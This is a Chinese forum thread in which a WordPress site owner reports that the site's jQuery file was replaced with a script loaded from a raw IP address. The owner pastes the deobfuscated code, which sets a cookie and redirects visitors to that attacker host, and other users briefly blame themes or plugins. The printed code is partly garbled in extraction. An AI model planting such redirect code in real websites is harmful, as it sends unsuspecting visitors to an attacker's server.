未分類
11 6 月 2020

网站被挂马

Madlifer 大佬有话说 :

网站被挂马

不清楚什么情况 wordpress 目录wp-includes/js/jquery/jquery.js?ver=1.12.4-wp 突然变成了执行http://134.249.116.78/jquery.js

然后去这个JS后解密得到如下结果,有大佬知道这是什么意思吗?

var _0x93b0 = ["", "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789", "random", "length", "floor", "charAt", "getTime", "setTime", "cookie", "=", ";expires=", "toGMTString", "; path=", "indexOf", "substring", ";", "cookieEnabled", "__cfsuid", "1", "/", "href", "location", "http", "://", "134.", "249.", "116.", "78/?key="];

function rdn() {
    var _0xf31cx2 = _0x93b0;
    var _0xf31cx3 = _0x93b0;
    for (var _0xf31cx4 = 0; _0xf31cx4 < 32; _0xf31cx4++) {
      _0xf31cx2 += _0xf31cx3](Math](Math]() * _0xf31cx3]))
    };
    return _0xf31cx2
}

function _mmm_(_0xf31cx6, _0xf31cx7, _0xf31cx8, _0xf31cx9) {
    var _0xf31cxa = new Date();
    var _0xf31cxb = new Date();
    if (_0xf31cx8 === null || _0xf31cx8 === 0) {
      _0xf31cx8 = 3
    };
    _0xf31cxb](_0xf31cxa]() + 3600000 * 24 * _0xf31cx8);
    document] = _0xf31cx6 + _0x93b0 + escape(_0xf31cx7) + _0x93b0 + _0xf31cxb]() + ((_0xf31cx9) ? _0x93b0 + _0xf31cx9 : _0x93b0)
}

function _nnn_(_0xf31cxd) {
    var _0xf31cxe = document]](_0xf31cxd + _0x93b0);
    var _0xf31cxf = _0xf31cxe + _0xf31cxd] + 1;
    if ((!_0xf31cxe) && (_0xf31cxd != document]](0, _0xf31cxd]))) {
      return null
    };
    if (_0xf31cxe == -1) {
      return null
    };
    var _0xf31cx10 = document]](_0x93b0, _0xf31cxf);
    if (_0xf31cx10 == -1) {
      _0xf31cx10 = document]]
    };
    return unescape(document]](_0xf31cxf, _0xf31cx10))
}
if (navigator]) {
    if (_nnn_(_0x93b0) == 1) {} else {
      _mmm_(_0x93b0, _0x93b0, _0x93b0, _0x93b0);
      window]] = _0x93b0 + _0x93b0 + _0x93b0 + _0x93b0 + _0x93b0 + _0x93b0 + rdn()
    }
}

inkedus 大佬有话说 :

意思就是你被挂马了,赶紧跑路吧

亿硕云 大佬有话说 :

前排
–< 不错,楼下收了吧 >–

大英子 大佬有话说 :

没意义。。。

主题、插件的锅。。。

jiuqimax 大佬有话说 :

https://i.loli.net/2020/06/11/pwVRHXs7A8o1ekK.png

这样就好了yc014t

Madlifer 大佬有话说 :

jiuqimax 大佬有话说 : 2020-6-11 23:04
这样就好了

要不是这个站没开https 我加载不出来编辑器 就中招了

matoi 大佬有话说 :

不懂,问下楼下的js大佬https://cdn.jsdelivr.net/gh/hishis/forum-master/public/images/patch.gif